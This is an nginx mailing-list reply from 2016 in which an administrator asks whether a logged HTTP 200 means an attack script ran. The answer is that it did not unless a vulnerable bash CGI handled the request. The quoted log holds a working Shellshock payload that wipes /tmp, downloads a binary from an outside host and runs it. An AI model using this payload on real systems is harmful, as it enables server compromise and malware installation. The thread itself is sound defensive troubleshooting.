<div dir="ltr">Not unless your / location passes the request to a vulnerable cgi-script using a vulnerable version of bash.<div><br></div><div>SeeĀ <a href="https://en.wikipedia.org/wiki/Shellshock_(software_bug)">https://en.wikipedia.org/wiki/Shellshock_(software_bug)</a></div></div><div class="gmail_extra"><br><div class="gmail_quote">On Sat, Jul 30, 2016 at 7:57 PM, <a href="mailto:lists@lazygranch.com">lists@lazygranch.com</a> <span dir="ltr"><<a href="mailto:lists@lazygranch.com" target="_blank">lists@lazygranch.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">I see a return code of 200. Does that mean this script was executed?<br>
-------------<br>
219.153.48.45 - - [30/Jul/2016:07:40:07 +0000] "GET / HTTP/1.1" 200 643<br>
"() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget<br>
<a href="http://houmen.linux22.cn:123/houmen/linux223" rel="noreferrer" target="_blank">http://houmen.linux22.cn:123/houmen/linux223</a> -O /tmp/China.Z-slma<br>
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/R un.sh;echo chmod<br>
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma<br>
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod<br>
>> >> 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c \x22rm<br>
>> >> -rf /tmp/*;echo wget <a href="http://houmen" rel="noreferrer" target="_blank">http://houmen</a><br>
.<a href="http://linux22.cn:123/houmen/linux223" rel="noreferrer" target="_blank">linux22.cn:123/houmen/linux223</a> -O /tmp/China.Z-slma<br>
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod<br>
>> 777 /tmp/China.Z-slma >> /tmp/Run.sh;echo /tmp/China.Z-slma<br>
>> >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 7<br>
77 /tmp/Run.sh;/tmp/Run.sh\x22"<br>
-------------------------<br>
<br>
_______________________________________________<br>
nginx mailing list<br>
<a href="mailto:nginx@nginx.org">nginx@nginx.org</a><br>
<a href="http://mailman.nginx.org/mailman/listinfo/nginx" rel="noreferrer" target="_blank">http://mailman.nginx.org/mailman/listinfo/nginx</a><br>
</blockquote></div><br></div>